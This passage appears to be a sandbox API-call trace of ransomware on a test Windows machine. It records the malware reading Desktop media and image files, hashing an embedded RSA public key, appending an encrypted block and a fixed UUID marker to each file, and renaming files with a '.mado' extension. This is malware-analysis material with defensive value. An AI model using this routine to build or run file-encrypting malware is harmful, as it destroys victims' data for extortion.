KEY-----") returned 469 [0203.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.863] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.863] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.863] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.864] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.864] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.864] GetLastError () returned 0x0 [0203.864] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.864] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.864] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.864] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.864] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.864] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.865] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.865] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.865] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.865] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.865] CloseHandle (hObject=0x63c) returned 1 [0203.866] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N_1fqFQPI_Z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n_1fqfqpi_z.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N_1fqFQPI_Z.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n_1fqfqpi_z.m4a.mado")) returned 1 [0203.867] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c0fc0, ftCreationTime.dwHighDateTime=0x1d5e7ed, ftLastAccessTime.dwLowDateTime=0x1bad4ba0, ftLastAccessTime.dwHighDateTime=0x1d5e0fc, ftLastWriteTime.dwLowDateTime=0x1bad4ba0, ftLastWriteTime.dwHighDateTime=0x1d5e0fc, nFileSizeHigh=0x0, nFileSizeLow=0xcfb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbw9vz.jpg", cAlternateFileName="")) returned 1 [0203.867] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rbw9vz.jpg") returned=".jpg" [0203.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rbw9vz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rbw9vz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.867] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=53168) returned 1 [0203.867] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.869] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcf8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.869] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.870] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xcfb0, lpOverlapped=0x0) returned 1 [0203.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.870] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.871] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.871] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.871] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.871] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.871] GetLastError () returned 0x0 [0203.871] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.871] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.871] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.871] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.871] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.872] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.872] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcfb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.872] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.872] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.872] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.873] CloseHandle (hObject=0x63c) returned 1 [0203.874] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rbw9vz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rbw9vz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rbw9vz.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rbw9vz.jpg.mado")) returned 1 [0203.876] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72332bd0, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xed2e1d90, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0xed2e1d90, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sZ1h4QiinWnf", cAlternateFileName="SZ1H4Q~1")) returned 1 [0203.876] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a55d90, ftCreationTime.dwHighDateTime=0x1d5e25a, ftLastAccessTime.dwLowDateTime=0x8527cfc0, ftLastAccessTime.dwHighDateTime=0x1d5e579, ftLastWriteTime.dwLowDateTime=0x8527cfc0, ftLastWriteTime.dwHighDateTime=0x1d5e579, nFileSizeHigh=0x0, nFileSizeLow=0x13acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tWvw_Q1vCCLUwEx.avi", cAlternateFileName="TWVW_Q~1.AVI")) returned 1 [0203.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tWvw_Q1vCCLUwEx.avi") returned=".avi" [0203.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tWvw_Q1vCCLUwEx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\twvw_q1vccluwex.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.876] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=80587) returned 1 [0203.876] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.878] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13aa5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.878] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.878] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x13acb, lpOverlapped=0x0) returned 1 [0203.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.879] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.880] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.880] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.880] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.880] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.880] GetLastError () returned 0x0 [0203.880] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.880] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.880] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.880] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.880] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.880] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.881] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13acb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.881] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.881] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.881] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.881] CloseHandle (hObject=0x63c) returned 1 [0203.882] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tWvw_Q1vCCLUwEx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\twvw_q1vccluwex.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tWvw_Q1vCCLUwEx.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\twvw_q1vccluwex.avi.mado")) returned 1 [0203.884] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6b2fec0, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x78fba220, ftLastAccessTime.dwHighDateTime=0x1d5da30, ftLastWriteTime.dwLowDateTime=0x78fba220, ftLastWriteTime.dwHighDateTime=0x1d5da30, nFileSizeHigh=0x0, nFileSizeLow=0x8c3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vTdPeiNlgjct5.m4a", cAlternateFileName="VTDPEI~1.M4A")) returned 1 [0203.884] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTdPeiNlgjct5.m4a") returned=".m4a" [0203.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTdPeiNlgjct5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtdpeinlgjct5.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.884] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=35902) returned 1 [0203.884] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.885] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8c18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.885] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.887] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8c3e, lpOverlapped=0x0) returned 1 [0203.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.888] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.888] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.888] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.888] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.889] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.889] GetLastError () returned 0x0 [0203.889] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.889] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.889] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.889] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.889] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.889] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.889] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8c3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.889] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.890] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.890] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.890] CloseHandle (hObject=0x63c) returned 1 [0203.890] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTdPeiNlgjct5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtdpeinlgjct5.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vTdPeiNlgjct5.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtdpeinlgjct5.m4a.mado")) returned 1 [0203.893] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf42f59a0, ftCreationTime.dwHighDateTime=0x1d5d81e, ftLastAccessTime.dwLowDateTime=0xd9a8a4e0, ftLastAccessTime.dwHighDateTime=0x1d5df55, ftLastWriteTime.dwLowDateTime=0xd9a8a4e0, ftLastWriteTime.dwHighDateTime=0x1d5df55, nFileSizeHigh=0x0, nFileSizeLow=0x17998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vtRaYVcLR-.bmp", cAlternateFileName="VTRAYV~1.BMP")) returned 1 [0203.893] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vtRaYVcLR-.bmp") returned=".bmp" [0203.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 